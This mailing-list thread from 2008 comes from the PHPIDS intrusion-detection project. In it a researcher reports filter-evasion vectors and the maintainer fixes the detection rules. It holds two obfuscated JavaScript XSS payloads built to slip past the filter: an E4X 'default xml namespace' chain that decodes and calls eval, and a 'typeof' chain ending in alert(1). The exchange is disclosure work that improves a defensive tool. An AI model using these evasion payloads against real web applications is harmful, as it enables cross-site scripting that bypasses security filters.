New vector from sla.ckers
35 views
Skip to first unread message
Gareth
Sep 1, 2008, 4:34:28 AM9/1/08
to PHPIDS » Web Application Security 2.0
I've posted it here in case you can't get on sla.ckers:-
http://www.businessinfo.co.uk/labs/phpids/urlvector.php
http://www.businessinfo.co.uk/labs/phpids/urlvector.php
Mario Heiderich
Sep 1, 2008, 4:36:20 AM9/1/08
to php...@googlegroups.com
Hi!
Thanks - I wasn't online this weekend so I couldn't fix it yet. Will happen asap ;)
Grx,
.mario
Thanks - I wasn't online this weekend so I couldn't fix it yet. Will happen asap ;)
Grx,
.mario
On Mon, Sep 1, 2008 at 10:34 AM, Gareth <gazh...@gmail.com> wrote:
I've posted it here in case you can't get on sla.ckers:-
http://www.businessinfo.co.uk/labs/phpids/urlvector.php
Gareth
Sep 11, 2008, 5:00:48 PM9/11/08
to PHPIDS » Web Application Security 2.0
This is just beautiful :)
Check out the centrifuge evasion.
http://www.businessinfo.co.uk/labs/phpids/phpids3.html
default xml namespace=toolbar,b=1&&this.atob
default xml namespace=toolbar,e2=b('ZXZhbA')
default xml namespace=toolbar,e=this[toolbar,e2]
default xml namespace=toolbar,y=1&&name
default xml namespace=toolbar
default xml namespace=e(y)
On Sep 1, 9:36 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
Check out the centrifuge evasion.
http://www.businessinfo.co.uk/labs/phpids/phpids3.html
default xml namespace=toolbar,b=1&&this.atob
default xml namespace=toolbar,e2=b('ZXZhbA')
default xml namespace=toolbar,e=this[toolbar,e2]
default xml namespace=toolbar,y=1&&name
default xml namespace=toolbar
default xml namespace=e(y)
On Sep 1, 9:36 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hi!
>
> Thanks - I wasn't online this weekend so I couldn't fix it yet. Will happen
> asap ;)
>
> Grx,
> .mario
>
>
> Thanks - I wasn't online this weekend so I couldn't fix it yet. Will happen
> asap ;)
>
> Grx,
> .mario
>
Mario Heiderich
Sep 12, 2008, 5:21:32 AM9/12/08
to php...@googlegroups.com
Pure sweetness - and again almost painful to close this gap ;)
Very nice work!
Very nice work!
Gareth
Sep 12, 2008, 5:41:25 AM9/12/08
to PHPIDS » Web Application Security 2.0
Sniff Sniff
On Sep 12, 10:21 am, "Mario Heiderich"
On Sep 12, 10:21 am, "Mario Heiderich"
Mario Heiderich
Sep 12, 2008, 5:46:39 AM9/12/08
to php...@googlegroups.com
Anway - I bet E4X has more secrets in stock on how to execute and obfuscate JS ;)
Gareth
Sep 21, 2008, 3:55:09 PM9/21/08
to PHPIDS » Web Application Security 2.0
Javascript is weird :D
delete~typeof~typeof~typeof~typeof~typeof~typeof~alert(1)
On Sep 12, 10:46 am, "Mario Heiderich"
delete~typeof~typeof~typeof~typeof~typeof~typeof~alert(1)
On Sep 12, 10:46 am, "Mario Heiderich"
Mario Heiderich
Sep 24, 2008, 5:08:23 AM9/24/08
to php...@googlegroups.com
Awesome stuff - and very interesting bug which was uncovered by this vector. Fixed!
Reply all
Reply to author
Forward
0 new messages